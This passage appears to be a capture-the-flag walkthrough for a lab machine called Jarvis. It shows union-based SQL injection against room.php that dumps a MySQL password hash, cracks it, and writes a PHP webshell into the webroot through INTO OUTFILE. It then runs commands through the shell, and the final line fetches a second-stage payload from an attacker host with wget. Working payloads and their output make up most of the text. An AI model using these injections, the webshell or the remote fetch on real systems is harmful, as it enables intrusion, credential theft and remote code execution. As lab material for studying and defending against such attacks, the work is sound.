4. Port 80 — SQL injection in room.php (cod parameter)
http://jarvis.htb/room.php?cod=1
cod=1'
# page loads, but the room details are empty: the stray quote breaks the query and the app hides the error (blind failure, only the data block goes missing)
# tried ' UNION SELECT with 1 to 7 columns followed by -- ; nothing rendered. Together with the next step this suggests cod is used unquoted (numeric context), so a quote-based payload never forms valid SQL
# removing quote and checking
http://jarvis.htb/room.php?cod=1 UNION SELECT 1,2,3,4,5,6,7 -- -
# works: no error, so the injected UNION with 7 columns executes. The page still shows room 1, which suggests it only renders the first row of the result set and the UNION row is never displayed. (Trailing "-- -" because MariaDB requires whitespace after "--"; the extra "-" keeps the space from being trimmed in the URL.)
# use a cod value with no matching row (cod=7) so the UNION row is the only row the page has to render
http://jarvis.htb/room.php?cod=7 UNION SELECT 1,2,3,4,5,6,7 -- -
page returned contains 2,3,4,5
# columns 2-5 are reflected in the HTML, so any expression placed in those positions is displayed: in-band, union-based SQLi
version()   # substituted for one of the reflected columns (2-5)
10.1.37-MariaDB-0+deb9u1
select user, password from mysql.user limit 0,1   # succeeds, i.e. the web app's DB account can read mysql.user — far more privilege than a room-listing page needs; a finding in its own right
DBadmin
2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
# 40-hex value is the MySQL 4.1+ PASSWORD() format (SHA1(SHA1(pw)), normally shown with a leading "*"); cracked offline: imissyou
# the same DBadmin / imissyou pair logs into phpMyAdmin — credential reuse between the DB account and the admin UI
select schema_name from information_schema.schemata limit [0-3],1   # iterate the offset 0..3 (limit N,1) to pull one schema name per request, since only one row is rendered
hotel                 # the application database
information_schema    # system schema
mysql                 # system schema
performance_schema    # system schema
# before going through phpMyAdmin, try for a shell directly via the injection. INTO OUTFILE needs the DB account to hold the FILE privilege, secure_file_priv to be unset/permissive, and the target directory to be writable by the mysqld process user — test with a harmless file first
jarvis.htb/room.php?cod=7 UNION all SELECT 1,2,'kashz',4,5,6,7 INTO OUTFILE '/var/www/html/kashz.txt' -- -
# works: all three conditions hold, so the injection is an arbitrary file write into the webroot (the quoted 'kashz' is fine here because it sits in a value position, not at the injection point). Remove kashz.txt at the end of the engagement
http://jarvis.htb/kashz.txt
1 2 kashz 4 5 6 7
jarvis.htb/room.php?cod=7 UNION all SELECT 1,2,"<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; ?>",4,5,6,7 INTO OUTFILE '/var/www/html/k.php' -- -
# minimal PHP webshell written into the webroot (double quotes around the PHP so the single quotes inside need no escaping). It is unauthenticated: anyone who finds /k.php gets command execution as the web server user, so use an unguessable name and delete it when done
http://jarvis.htb/k.php?cmd=whoami;id;hostname;uname -a
1 2
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
jarvis
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
4 5 6 7   # the "1 2" and "4 5 6 7" around the output are the other UNION columns written into k.php
# to upgrade to an interactive shell, pull a second-stage PHP (e.g. a reverse shell) from the attacker box and request it through the web server; wget writes into the web server process's current directory, which must be writable by www-data for this to work
http://jarvis.htb/k.php?cmd=wget 10.10.16.5/web.php